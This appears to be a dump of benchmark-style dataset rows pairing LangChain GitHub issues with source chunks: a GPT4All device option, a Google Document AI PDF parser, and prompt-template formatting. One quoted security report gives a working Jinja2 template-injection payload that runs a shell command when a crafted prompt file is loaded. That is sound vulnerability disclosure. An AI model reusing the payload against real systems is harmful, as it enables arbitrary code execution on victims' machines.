It is necessary to be able to select the device on GPU-powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | """Configuration for this pydantic object."""
extra = Extra.forbid
@staticmethod
def _model_param_names() -> Set[str]:
return {
"max_tokens",
"n_predict",
"top_k",
"top_p",
"temp",
"n_batch",
"repeat_penalty",
"repeat_last_n",
}
def _default_params(self) -> Dict[str, Any]:
return {
"max_tokens": self.max_tokens,
"n_predict": self.n_predict,
"top_k": self.top_k,
"top_p": self.top_p,
"temp": self.temp,
"n_batch": self.n_batch,
"repeat_penalty": self.repeat_penalty,
"repeat_last_n": self.repeat_last_n,
}
@root_validator()
def validate_environment(cls, values: Dict) -> Dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLaMA now supports selecting a device, and so does GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
It is necessary to be able to select the device on GPU-powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | """Validate that the python package exists in the environment."""
try:
from gpt4all import GPT4All as GPT4AllModel
except ImportError:
raise ImportError(
"Could not import gpt4all python package. "
"Please install it with `pip install gpt4all`."
)
full_path = values["model"]
model_path, delimiter, model_name = full_path.rpartition("/")
model_path += delimiter
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
)
if values["n_threads"] is not None:
values["client"].model.set_thread_count(values["n_threads"])
try:
values["backend"] = values["client"].model_type
except AttributeError:
values["backend"] = values["client"].model.model_type
return values
@property
def _identifying_params(self) -> Mapping[str, Any]: |
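What the issue is asking for can be sketched against the `gpt4all` package directly, next to the `validate_environment` chunk above. This assumes a `gpt4all` release whose `GPT4All.__init__` accepts a `device` argument, as the linked docs describe; the model file name is a placeholder:

```python
from gpt4all import GPT4All as GPT4AllModel

# Assumes a gpt4all build that accepts `device`; see the linked gpt4all docs.
client = GPT4AllModel(
    "ggml-gpt4all-model.bin",  # placeholder model file name
    model_path=None,           # fall back to the default ~/.cache/gpt4all/
    allow_download=True,
    device="gpu",              # e.g. "cpu", "gpu", "nvidia", "amd", or a device name
)
print(client.generate("Once upon a time, ", max_tokens=32))
```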
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLaMA now supports selecting a device, and so does GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
It is necessary to be able to select the device on GPU-powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | """Get the identifying parameters."""
return {
"model": self.model,
**self._default_params(),
**{
k: v for k, v in self.__dict__.items() if k in self._model_param_names()
},
}
@property
def _llm_type(self) -> str:
"""Return the type of llm."""
return "gpt4all"
def _call( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLaMA now supports selecting a device, and so does GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
It is necessary to be able to select the device on GPU-powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> str:
r"""Call out to GPT4All's generate method.
Args:
prompt: The prompt to pass into the model.
stop: A list of strings to stop generation when encountered.
Returns:
The string generated by the model.
Example:
.. code-block:: python
prompt = "Once upon a time, "
response = model(prompt, n_predict=55)
"""
text_callback = None
if run_manager:
text_callback = partial(run_manager.on_llm_new_token, verbose=self.verbose)
text = ""
params = {**self._default_params(), **kwargs}
for token in self.client.generate(prompt, **params):
if text_callback:
text_callback(token)
text += token
if stop is not None:
text = enforce_stop_tokens(text, stop)
return text |
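For context, a short usage sketch of the wrapper whose `_call` appears above: call-time kwargs override `_default_params()`, and tokens can be streamed through a callback. The model path is a placeholder:

```python
from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler
from langchain.llms import GPT4All

llm = GPT4All(
    model="./models/gpt4all-model.bin",            # placeholder path
    callbacks=[StreamingStdOutCallbackHandler()],  # prints each token as it arrives
    n_threads=8,
)
# Call-time kwargs (temp, max_tokens, ...) override the instance defaults,
# and `stop` strings truncate the output via enforce_stop_tokens.
text = llm("Once upon a time, ", stop=["\n\n"], temp=0.3, max_tokens=64)
```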
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors for specific document types, and built-in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself; I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | """Module contains a PDF parser based on DocAI from Google Cloud.
You need to install two libraries to use this parser:
pip install google-cloud-documentai
pip install google-cloud-documentai-toolbox
"""
import logging
import time
from dataclasses import dataclass
from typing import TYPE_CHECKING, Iterator, List, Optional, Sequence
from langchain.docstore.document import Document
from langchain.document_loaders.base import BaseBlobParser
from langchain.document_loaders.blob_loaders import Blob
from langchain.utils.iter import batch_iterate
if TYPE_CHECKING:
from google.api_core.operation import Operation
from google.cloud.documentai import DocumentProcessorServiceClient
logger = logging.getLogger(__name__)
@dataclass
class DocAIParsingResults: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors for specific document types, and built-in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself; I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | """A dataclass to store DocAI parsing results."""
source_path: str
parsed_path: str
class DocAIParser(BaseBlobParser):
def __init__(
self,
*,
client: Optional["DocumentProcessorServiceClient"] = None,
location: Optional[str] = None,
gcs_output_path: Optional[str] = None,
processor_name: Optional[str] = None,
):
"""Initializes the parser.
Args:
client: a DocumentProcessorServiceClient to use
location: a GCP location where a DocAI parser is located
gcs_output_path: a path on GCS to store parsing results
processor_name: name of a processor
You should provide either a client or location (and then a client |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors for specific document types, and built-in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself; I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | would be instantiated).
"""
if client and location:
raise ValueError(
"You should provide either a client or a location but not both "
"of them."
)
if not client and not location:
raise ValueError(
"You must specify either a client or a location to instantiate "
"a client."
)
self._gcs_output_path = gcs_output_path
self._processor_name = processor_name
if client:
self._client = client
else:
try:
from google.api_core.client_options import ClientOptions
from google.cloud.documentai import DocumentProcessorServiceClient
except ImportError:
raise ImportError(
"documentai package not found, please install it with"
" `pip install google-cloud-documentai`"
)
options = ClientOptions(
api_endpoint=f"{location}-documentai.googleapis.com"
)
self._client = DocumentProcessorServiceClient(client_options=options)
def lazy_parse(self, blob: Blob) -> Iterator[Document]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors for specific document types, and built-in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself; I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | """Parses a blob lazily.
Args:
blob: a Blob to parse
This is a long-running operation! A recommended way is to batch
documents together and use the `batch_parse` method.
"""
yield from self.batch_parse([blob], gcs_output_path=self._gcs_output_path)
def batch_parse(
self,
blobs: Sequence[Blob],
gcs_output_path: Optional[str] = None,
timeout_sec: int = 3600,
check_in_interval_sec: int = 60,
) -> Iterator[Document]:
"""Parses a list of blobs lazily.
Args:
blobs: a list of blobs to parse
gcs_output_path: a path on GCS to store parsing results
timeout_sec: a timeout to wait for DocAI to complete, in seconds
check_in_interval_sec: an interval to wait until next check
whether parsing operations have been completed, in seconds
This is a long-running operation! A recommended way is to decouple
parsing from creating Langchain Documents:
>>> operations = parser.docai_parse(blobs, gcs_path)
>>> parser.is_running(operations) |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors for specific document types, and built-in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself; I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | You can get operations names and save them:
>>> names = [op.operation.name for op in operations]
And when all operations are finished, you can use their results:
>>> operations = parser.operations_from_names(operation_names)
>>> results = parser.get_results(operations)
>>> docs = parser.parse_from_results(results)
"""
output_path = gcs_output_path if gcs_output_path else self._gcs_output_path
if output_path is None:
raise ValueError("An output path on GCS should be provided!")
operations = self.docai_parse(blobs, gcs_output_path=output_path)
operation_names = [op.operation.name for op in operations]
logger.debug(
f"Started parsing with DocAI, submitted operations {operation_names}"
)
is_running, time_elapsed = True, 0
while is_running:
is_running = self.is_running(operations)
if not is_running:
break
time.sleep(check_in_interval_sec)
time_elapsed += check_in_interval_sec
if time_elapsed > timeout_sec:
raise ValueError(
"Timeout exceeded! Check operations " f"{operation_names} later!"
)
logger.debug(".")
results = self.get_results(operations=operations)
yield from self.parse_from_results(results)
def parse_from_results( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors for specific document types, and built-in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself; I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | self, results: List[DocAIParsingResults]
) -> Iterator[Document]:
try:
from google.cloud.documentai_toolbox.wrappers.document import _get_shards
from google.cloud.documentai_toolbox.wrappers.page import _text_from_layout
except ImportError:
raise ImportError(
"documentai_toolbox package not found, please install it with"
" `pip install google-cloud-documentai-toolbox`"
)
for result in results:
output_gcs = result.parsed_path.split("/")
gcs_bucket_name = output_gcs[2]
gcs_prefix = "/".join(output_gcs[3:]) + "/"
shards = _get_shards(gcs_bucket_name, gcs_prefix)
docs, page_number = [], 1
for shard in shards:
for page in shard.pages:
docs.append(
Document(
page_content=_text_from_layout(page.layout, shard.text),
metadata={
"page": page_number,
"source": result.source_path,
},
)
)
page_number += 1
yield from docs
def operations_from_names(self, operation_names: List[str]) -> List["Operation"]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors for specific document types, and built-in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself; I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | """Initializes Long-Running Operations from their names."""
try:
from google.longrunning.operations_pb2 import (
GetOperationRequest,
)
except ImportError:
raise ImportError(
"documentai package not found, please install it with"
" `pip install gapic-google-longrunning`"
)
operations = []
for name in operation_names:
request = GetOperationRequest(name=name)
operations.append(self._client.get_operation(request=request))
return operations
def is_running(self, operations: List["Operation"]) -> bool:
for op in operations:
if not op.done():
return True
return False
def docai_parse( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors for specific document types, and built-in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself; I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | self,
blobs: Sequence[Blob],
*,
gcs_output_path: Optional[str] = None,
batch_size: int = 4000,
enable_native_pdf_parsing: bool = True,
) -> List["Operation"]:
"""Runs Google DocAI PDF parser on a list of blobs.
Args:
blobs: a list of blobs to be parsed
gcs_output_path: a path (folder) on GCS to store results
batch_size: amount of documents per batch
enable_native_pdf_parsing: a config option for the parser
DocAI has a limit on the number of documents per batch, so we split a
batch into mini-batches. Parsing is an async long-running operation
on Google Cloud, and results are stored in an output GCS bucket.
"""
try:
from google.cloud import documentai
from google.cloud.documentai_v1.types import OcrConfig, ProcessOptions
except ImportError:
raise ImportError(
"documentai package not found, please install it with"
" `pip install google-cloud-documentai`"
)
if not self._processor_name: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors for specific document types, and built-in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself; I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | raise ValueError("Processor name is not defined, aborting!")
output_path = gcs_output_path if gcs_output_path else self._gcs_output_path
if output_path is None:
raise ValueError("An output path on GCS should be provided!")
operations = []
for batch in batch_iterate(size=batch_size, iterable=blobs):
documents = []
for blob in batch:
gcs_document = documentai.GcsDocument(
gcs_uri=blob.path, mime_type="application/pdf"
)
documents.append(gcs_document)
gcs_documents = documentai.GcsDocuments(documents=documents)
input_config = documentai.BatchDocumentsInputConfig(
gcs_documents=gcs_documents
)
gcs_output_config = documentai.DocumentOutputConfig.GcsOutputConfig(
gcs_uri=output_path, field_mask=None
)
output_config = documentai.DocumentOutputConfig(
gcs_output_config=gcs_output_config
)
if enable_native_pdf_parsing:
process_options = ProcessOptions(
ocr_config=OcrConfig(
enable_native_pdf_parsing=enable_native_pdf_parsing
)
)
else:
process_options = ProcessOptions() |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,589 | Add Google Cloud Document AI integration | ### Feature request
Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.
### Motivation
This product offers Optical Character Recognition, specialized processors for specific document types, and built-in Generative AI processing for Document Summarization and entity extraction.
### Your contribution
I can implement this myself; I mostly want to understand where and how this could fit into the library.
Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity.
Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output. | https://github.com/langchain-ai/langchain/issues/10589 | https://github.com/langchain-ai/langchain/pull/11413 | 628cc4cce8b4e6068dacc92836cc8045b94afa37 | 09c66fe04fe20b39d307df0419d742a7a28bab98 | "2023-09-14T16:57:14Z" | python | "2023-10-09T15:04:25Z" | libs/langchain/langchain/document_loaders/parsers/docai.py | request = documentai.BatchProcessRequest(
name=self._processor_name,
input_documents=input_config,
document_output_config=output_config,
process_options=process_options,
)
operations.append(self._client.batch_process_documents(request))
return operations
def get_results(self, operations: List["Operation"]) -> List[DocAIParsingResults]:
try:
from google.cloud.documentai_v1 import BatchProcessMetadata
except ImportError:
raise ImportError(
"documentai package not found, please install it with"
" `pip install google-cloud-documentai`"
)
results = []
for op in operations:
if isinstance(op.metadata, BatchProcessMetadata):
metadata = op.metadata
else:
metadata = BatchProcessMetadata.deserialize(op.metadata.value)
for status in metadata.individual_process_statuses:
source = status.input_gcs_source
output = status.output_gcs_destination
results.append(
DocAIParsingResults(source_path=source, parsed_path=output)
)
return results |
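Putting the methods above together, here is a sketch of the decoupled workflow that the `batch_parse` docstring describes. The import path, project and processor names, and GCS URIs are placeholders, not verified values:

```python
from langchain.document_loaders.blob_loaders import Blob
from langchain.document_loaders.parsers.docai import DocAIParser  # import path assumed

parser = DocAIParser(
    location="us",
    processor_name="projects/my-project/locations/us/processors/my-processor",
    gcs_output_path="gs://my-bucket/docai-output/",
)
blobs = [Blob(path="gs://my-bucket/input/report.pdf")]

# Kick off the long-running DocAI operations and persist their names.
operations = parser.docai_parse(blobs, gcs_output_path="gs://my-bucket/docai-output/")
names = [op.operation.name for op in operations]

# ...later, possibly in another process, rebuild the operations and collect docs.
operations = parser.operations_from_names(names)
if not parser.is_running(operations):
    results = parser.get_results(operations)
    docs = list(parser.parse_from_results(results))
```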
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. The `dir` command will be executed.
Attack scenario: Alice can send a prompt file to Bob and get Bob to load it.
Analysis: Jinja2 is used to render prompts, so template injection can happen.
Note: in pt.json, the `template` field carries the payload; the index of `__subclasses__` may differ in other environments.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/base.py | """BasePrompt schema definition."""
from __future__ import annotations
import warnings
from abc import ABC
from typing import Any, Callable, Dict, List, Set
from langchain.schema.messages import BaseMessage, HumanMessage
from langchain.schema.prompt import PromptValue
from langchain.schema.prompt_template import BasePromptTemplate
from langchain.utils.formatting import formatter
def jinja2_formatter(template: str, **kwargs: Any) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. The `dir` command will be executed.
Attack scenario: Alice can send a prompt file to Bob and get Bob to load it.
Analysis: Jinja2 is used to render prompts, so template injection can happen.
Note: in pt.json, the `template` field carries the payload; the index of `__subclasses__` may differ in other environments.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/base.py | """Format a template using jinja2."""
try:
from jinja2 import Template
except ImportError:
raise ImportError(
"jinja2 not installed, which is needed to use the jinja2_formatter. "
"Please install it with `pip install jinja2`."
)
return Template(template).render(**kwargs)
def validate_jinja2(template: str, input_variables: List[str]) -> None:
"""
Validate that the input variables are valid for the template.
Issues a warning if missing or extra variables are found.
Args:
template: The template string.
input_variables: The input variables.
"""
input_variables_set = set(input_variables)
valid_variables = _get_jinja2_variables_from_template(template)
missing_variables = valid_variables - input_variables_set
extra_variables = input_variables_set - valid_variables
warning_message = ""
if missing_variables:
warning_message += f"Missing variables: {missing_variables} "
if extra_variables:
warning_message += f"Extra variables: {extra_variables}"
if warning_message:
warnings.warn(warning_message.strip())
def _get_jinja2_variables_from_template(template: str) -> Set[str]: |
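One way to close the hole the issue demonstrates is to render untrusted templates in Jinja2's sandbox instead of a bare `Template`. This is a sketch of that mitigation, not necessarily the exact change that shipped; `SandboxedEnvironment` refuses access to underscored attributes such as `__class__`:

```python
from jinja2.sandbox import SandboxedEnvironment

def jinja2_formatter_sandboxed(template: str, **kwargs) -> str:
    # SandboxedEnvironment raises jinja2.exceptions.SecurityError when a
    # template touches unsafe attributes, blocking the __subclasses__ chain.
    return SandboxedEnvironment().from_string(template).render(**kwargs)

payload = "{{ ''.__class__.__bases__[0].__subclasses__() }}"
try:
    jinja2_formatter_sandboxed(payload)
except Exception as exc:
    print(f"blocked: {exc}")
```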
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
